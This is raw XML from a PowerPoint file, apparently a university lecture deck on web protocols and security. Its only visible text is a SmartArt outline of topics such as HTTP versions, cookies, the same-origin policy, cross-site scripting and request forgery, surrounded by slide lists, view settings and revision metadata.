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97"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId98"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="388" r:id="rId2"/>
    <p:sldId id="404" r:id="rId3"/>
    <p:sldId id="536" r:id="rId4"/>
    <p:sldId id="537" r:id="rId5"/>
    <p:sldId id="538" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="337" r:id="rId8"/>
    <p:sldId id="336" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="339" r:id="rId11"/>
    <p:sldId id="544" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="541" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="503" r:id="rId17"/>
    <p:sldId id="507" r:id="rId18"/>
    <p:sldId id="539" r:id="rId19"/>
    <p:sldId id="543" r:id="rId20"/>
    <p:sldId id="545" r:id="rId21"/>
    <p:sldId id="546" r:id="rId22"/>
    <p:sldId id="542" r:id="rId23"/>
    <p:sldId id="506" r:id="rId24"/>
    <p:sldId id="508" r:id="rId25"/>
    <p:sldId id="547" r:id="rId26"/>
    <p:sldId id="510" r:id="rId27"/>
    <p:sldId id="512" r:id="rId28"/>
    <p:sldId id="540" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="548" r:id="rId32"/>
    <p:sldId id="549" r:id="rId33"/>
    <p:sldId id="550" r:id="rId34"/>
    <p:sldId id="356" r:id="rId35"/>
    <p:sldId id="551" r:id="rId36"/>
    <p:sldId id="552" r:id="rId37"/>
    <p:sldId id="369" r:id="rId38"/>
    <p:sldId id="370" r:id="rId39"/>
    <p:sldId id="505" r:id="rId40"/>
    <p:sldId id="345" r:id="rId41"/>
    <p:sldId id="368" r:id="rId42"/>
    <p:sldId id="287" r:id="rId43"/>
    <p:sldId id="288" r:id="rId44"/>
    <p:sldId id="532" r:id="rId45"/>
    <p:sldId id="372" r:id="rId46"/>
    <p:sldId id="373" r:id="rId47"/>
    <p:sldId id="374" r:id="rId48"/>
    <p:sldId id="553" r:id="rId49"/>
    <p:sldId id="376" r:id="rId50"/>
    <p:sldId id="377" r:id="rId51"/>
    <p:sldId id="417" r:id="rId52"/>
    <p:sldId id="379" r:id="rId53"/>
    <p:sldId id="381" r:id="rId54"/>
    <p:sldId id="382" r:id="rId55"/>
    <p:sldId id="383" r:id="rId56"/>
    <p:sldId id="384" r:id="rId57"/>
    <p:sldId id="385" r:id="rId58"/>
    <p:sldId id="386" r:id="rId59"/>
    <p:sldId id="387" r:id="rId60"/>
    <p:sldId id="530" r:id="rId61"/>
    <p:sldId id="391" r:id="rId62"/>
    <p:sldId id="392" r:id="rId63"/>
    <p:sldId id="554" r:id="rId64"/>
    <p:sldId id="406" r:id="rId65"/>
    <p:sldId id="407" r:id="rId66"/>
    <p:sldId id="408" r:id="rId67"/>
    <p:sldId id="409" r:id="rId68"/>
    <p:sldId id="411" r:id="rId69"/>
    <p:sldId id="412" r:id="rId70"/>
    <p:sldId id="413" r:id="rId71"/>
    <p:sldId id="414" r:id="rId72"/>
    <p:sldId id="415" r:id="rId73"/>
    <p:sldId id="555" r:id="rId74"/>
    <p:sldId id="581" r:id="rId75"/>
    <p:sldId id="558" r:id="rId76"/>
    <p:sldId id="559" r:id="rId77"/>
    <p:sldId id="560" r:id="rId78"/>
    <p:sldId id="561" r:id="rId79"/>
    <p:sldId id="563" r:id="rId80"/>
    <p:sldId id="566" r:id="rId81"/>
    <p:sldId id="577" r:id="rId82"/>
    <p:sldId id="584" r:id="rId83"/>
    <p:sldId id="569" r:id="rId84"/>
    <p:sldId id="565" r:id="rId85"/>
    <p:sldId id="578" r:id="rId86"/>
    <p:sldId id="579" r:id="rId87"/>
    <p:sldId id="567" r:id="rId88"/>
    <p:sldId id="580" r:id="rId89"/>
    <p:sldId id="556" r:id="rId90"/>
    <p:sldId id="582" r:id="rId91"/>
    <p:sldId id="572" r:id="rId92"/>
    <p:sldId id="573" r:id="rId93"/>
    <p:sldId id="574" r:id="rId94"/>
    <p:sldId id="575" r:id="rId95"/>
    <p:sldId id="576" r:id="rId96"/>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206C271-A17B-4745-8409-D19C184D271D}">
          <p14:sldIdLst>
            <p14:sldId id="388"/>
            <p14:sldId id="404"/>
            <p14:sldId id="536"/>
            <p14:sldId id="537"/>
            <p14:sldId id="538"/>
            <p14:sldId id="258"/>
            <p14:sldId id="337"/>
            <p14:sldId id="336"/>
            <p14:sldId id="338"/>
            <p14:sldId id="339"/>
            <p14:sldId id="544"/>
            <p14:sldId id="289"/>
            <p14:sldId id="541"/>
            <p14:sldId id="265"/>
            <p14:sldId id="291"/>
            <p14:sldId id="503"/>
            <p14:sldId id="507"/>
            <p14:sldId id="539"/>
            <p14:sldId id="543"/>
            <p14:sldId id="545"/>
            <p14:sldId id="546"/>
            <p14:sldId id="542"/>
            <p14:sldId id="506"/>
            <p14:sldId id="508"/>
            <p14:sldId id="547"/>
            <p14:sldId id="510"/>
            <p14:sldId id="512"/>
            <p14:sldId id="540"/>
            <p14:sldId id="286"/>
            <p14:sldId id="280"/>
            <p14:sldId id="548"/>
            <p14:sldId id="549"/>
            <p14:sldId id="550"/>
            <p14:sldId id="356"/>
            <p14:sldId id="551"/>
            <p14:sldId id="552"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="505"/>
            <p14:sldId id="345"/>
            <p14:sldId id="368"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
            <p14:sldId id="532"/>
            <p14:sldId id="372"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="553"/>
            <p14:sldId id="376"/>
            <p14:sldId id="377"/>
            <p14:sldId id="417"/>
            <p14:sldId id="379"/>
            <p14:sldId id="381"/>
            <p14:sldId id="382"/>
            <p14:sldId id="383"/>
            <p14:sldId id="384"/>
            <p14:sldId id="385"/>
            <p14:sldId id="386"/>
            <p14:sldId id="387"/>
            <p14:sldId id="530"/>
            <p14:sldId id="391"/>
            <p14:sldId id="392"/>
            <p14:sldId id="554"/>
            <p14:sldId id="406"/>
            <p14:sldId id="407"/>
            <p14:sldId id="408"/>
            <p14:sldId id="409"/>
            <p14:sldId id="411"/>
            <p14:sldId id="412"/>
            <p14:sldId id="413"/>
            <p14:sldId id="414"/>
            <p14:sldId id="415"/>
            <p14:sldId id="555"/>
            <p14:sldId id="581"/>
            <p14:sldId id="558"/>
            <p14:sldId id="559"/>
            <p14:sldId id="560"/>
            <p14:sldId id="561"/>
            <p14:sldId id="563"/>
            <p14:sldId id="566"/>
            <p14:sldId id="577"/>
            <p14:sldId id="584"/>
            <p14:sldId id="569"/>
            <p14:sldId id="565"/>
            <p14:sldId id="578"/>
            <p14:sldId id="579"/>
            <p14:sldId id="567"/>
            <p14:sldId id="580"/>
            <p14:sldId id="556"/>
            <p14:sldId id="582"/>
            <p14:sldId id="572"/>
            <p14:sldId id="573"/>
            <p14:sldId id="574"/>
            <p14:sldId id="575"/>
            <p14:sldId id="57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9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47" autoAdjust="0"/>
    <p:restoredTop sz="89728" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="82" y="113"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-38184"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="184"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="-252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Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}"/>
    <pc:docChg chg="addSld modSld sldOrd modSection">
      <pc:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:14.953" v="163" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:10.687" v="161" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3140473184" sldId="422"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:27:13.202" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140473184" sldId="422"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Jackson, Alden" userId="S::awjacks@northeastern.edu::057f6ed4-5b0d-4701-ad80-193f163f4b8a" providerId="AD" clId="Web-{AD4B278F-949E-13E3-3C4D-4AD89A1F7749}" dt="2019-01-10T19:33:10.687" v="161" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3140473184" sldId="422"/>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C00306-5539-47D0-8EC1-4FA29B6B05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2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7403DD97-E551-4F02-AC7E-E2E3C6F639A7}" type="parTrans" cxnId="{2D28153B-AE96-41A0-BF56-3D5BF6756669}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A857F529-A931-4BD5-BBE3-B2350947A2A8}" type="sibTrans" cxnId="{2D28153B-AE96-41A0-BF56-3D5BF6756669}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DE98196-CC6B-429F-9EF0-A9F409C32C04}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0"/>
            <a:t>HTTP 0.9/1.0</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76AA2F65-46DC-48A4-B52D-4C6A21EF895D}" type="parTrans" cxnId="{DF798899-B625-4B32-8908-6BE07863D1F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD818EF2-5481-4DE0-A76E-A490D37DBF98}" type="sibTrans" cxnId="{DF798899-B625-4B32-8908-6BE07863D1F0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86A757CD-1C3A-4CE3-ACD8-DD62AAFEF32E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>HTTP 1.1</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91144F6F-129C-4560-A537-C02C8B2FE4E1}" type="parTrans" cxnId="{5977ED41-A3A3-41E5-8990-58AAC80DA523}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F37D28BD-ABA4-4F26-AC78-9F9491535BF7}" type="sibTrans" cxnId="{5977ED41-A3A3-41E5-8990-58AAC80DA523}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0D4B55B-C0E1-4D7F-AC46-D7FF15ED09F1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Cookies</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BBD8A2B-CA8E-44C2-8669-810A6B30AB18}" type="parTrans" cxnId="{1488503B-52D5-472E-8C23-DB07271BD10F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7D41C5C-9194-4639-B33A-6EECDF89E308}" type="sibTrans" cxnId="{1488503B-52D5-472E-8C23-DB07271BD10F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Web Security</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{619F070B-9BBC-47CA-9F76-82CED5328F18}" type="parTrans" cxnId="{F3F0A524-ED0E-4D6D-A123-F1D4050B09EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{67333CAB-A342-469E-9805-3019B77831C7}" type="sibTrans" cxnId="{F3F0A524-ED0E-4D6D-A123-F1D4050B09EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6268117A-2944-434D-BC86-48DA2B7115FA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Same Origin Policy</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99DE7160-6E41-42A0-A07D-60C866A63948}" type="parTrans" cxnId="{BE234406-8B6B-47B2-A471-C1FD80A09446}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A311980-D7A9-42A8-B532-7A0F4C474622}" type="sibTrans" cxnId="{BE234406-8B6B-47B2-A471-C1FD80A09446}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6123BD1-0618-4C14-9D37-80F2A7D50993}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Cross Site Scripting</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{971BB7EB-A7AE-4D9E-A83D-D736140DCA11}" type="parTrans" cxnId="{E3B1FB1C-D757-411B-BBA0-CECCF8E359D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCF6DD54-C021-4B02-9651-5A00AD156D17}" type="sibTrans" cxnId="{E3B1FB1C-D757-411B-BBA0-CECCF8E359D1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{802425C7-60B3-44A1-84EB-7D137CE664A4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Cross Site Request Forgery</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27B17746-2845-4A78-B935-35BA4360F3B9}" type="parTrans" cxnId="{D9039DB5-28C9-455B-B221-FE6621E59242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8D83533-0E57-4152-8445-3149DCB9A938}" type="sibTrans" cxnId="{D9039DB5-28C9-455B-B221-FE6621E59242}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{445A880B-876A-43F9-AFD4-890397DF09AB}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800"/>
            <a:t>Evolution of HTTP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5831689-C124-49E5-8C95-34A09757EA0F}" type="parTrans" cxnId="{B14398CE-BC13-4630-906E-605736CA9105}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04112523-660A-4A7F-9E41-1943608A0246}" type="sibTrans" cxnId="{B14398CE-BC13-4630-906E-605736CA9105}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{644E1225-4FA2-406E-96F5-5E6C0AC6FA58}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0"/>
            <a:t>HTTP 2</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9446D3B9-186C-4F30-8214-6A03DB60EBEE}" type="parTrans" cxnId="{45A7EF89-8396-4DEA-B5F4-6E619EDD34AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA2CB6BC-7529-434F-8B6C-3B4C421E076E}" type="sibTrans" cxnId="{45A7EF89-8396-4DEA-B5F4-6E619EDD34AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F075D57C-52E0-412C-AA91-4D7D2BE5D030}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0"/>
            <a:t>HTTP 3 </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55CCCB33-3D2B-46BD-A236-70685F5E3EAF}" type="parTrans" cxnId="{6B42C7D6-6C96-4F66-B0FC-1BB53FF54AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB209B2D-3B48-487D-8CA5-08001563114B}" type="sibTrans" cxnId="{6B42C7D6-6C96-4F66-B0FC-1BB53FF54AFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0425122D-8270-4384-9E52-1B6E50F1BCFB}" type="pres">
      <dgm:prSet presAssocID="{86C00306-5539-47D0-8EC1-4FA29B6B0574}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{720584FF-5EF0-4E24-B554-05FF9CBC3CBD}" type="pres">
      <dgm:prSet presAssocID="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BF41BC15-BB69-47AE-BD5C-D4718FB063F5}" type="pres">
      <dgm:prSet presAssocID="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C8F2DD67-61C9-454D-8B88-4666D1CEF417}" type="pres">
      <dgm:prSet presAssocID="{C2AD8FEE-92C6-4D1B-B433-80D2CC3CC6AB}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE2C2C95-9AEA-4A2C-AAE9-BF484025D61F}" type="pres">
      <dgm:prSet presAssocID="{A857F529-A931-4BD5-BBE3-B2350947A2A8}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{22BF2585-D325-49B8-9EAA-D551C4B63654}" type="pres">
      <dgm:prSet presAssocID="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D795AD54-04A0-47F0-991F-2E07EDA41ACF}" type="pres">
      <dgm:prSet presAssocID="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63CBBE27-B9AA-4B4F-B955-619E8E263C8E}" type="pres">
      <dgm:prSet presAssocID="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{397B44EB-7346-4103-AE2C-3A7DB30BEFB5}" type="pres">
      <dgm:prSet presAssocID="{67333CAB-A342-469E-9805-3019B77831C7}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{686F9868-B497-4525-8B6D-A372AC8DDBE3}" type="pres">
      <dgm:prSet presAssocID="{445A880B-876A-43F9-AFD4-890397DF09AB}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2CBC7C3-C767-4C48-9CD3-E2C0865531E5}" type="pres">
      <dgm:prSet presAssocID="{445A880B-876A-43F9-AFD4-890397DF09AB}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{604B129E-384B-4F89-A7BF-333BD1D83ACD}" type="pres">
      <dgm:prSet presAssocID="{445A880B-876A-43F9-AFD4-890397DF09AB}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C80BF903-ED35-46FF-931A-0FF6EBD1D6B8}" type="presOf" srcId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" destId="{D795AD54-04A0-47F0-991F-2E07EDA41ACF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{BE234406-8B6B-47B2-A471-C1FD80A09446}" srcId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" destId="{6268117A-2944-434D-BC86-48DA2B7115FA}" srcOrd="0" destOrd="0" parTransId="{99DE7160-6E41-42A0-A07D-60C866A63948}" sibTransId="{2A311980-D7A9-42A8-B532-7A0F4C474622}"/>
    <dgm:cxn modelId="{4FD7970B-1C58-47EC-A4A9-2E43CB28F7DC}" type="presOf" srcId="{F075D57C-52E0-412C-AA91-4D7D2BE5D030}" destId="{604B129E-384B-4F89-A7BF-333BD1D83ACD}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{E3B1FB1C-D757-411B-BBA0-CECCF8E359D1}" srcId="{231CAC7C-6C00-4F21-A4AB-6823F8480330}" destId="{D6123BD1-0618-4C14-9D37-80F2A7D50993}" srcOrd="1" destOrd="0" parTransId="{971BB7EB-A7AE-4D9E-A83D-D736140DCA11}" sibTransId="{BCF6DD54-C021-4B02-9651-5A00AD156D17}"/>
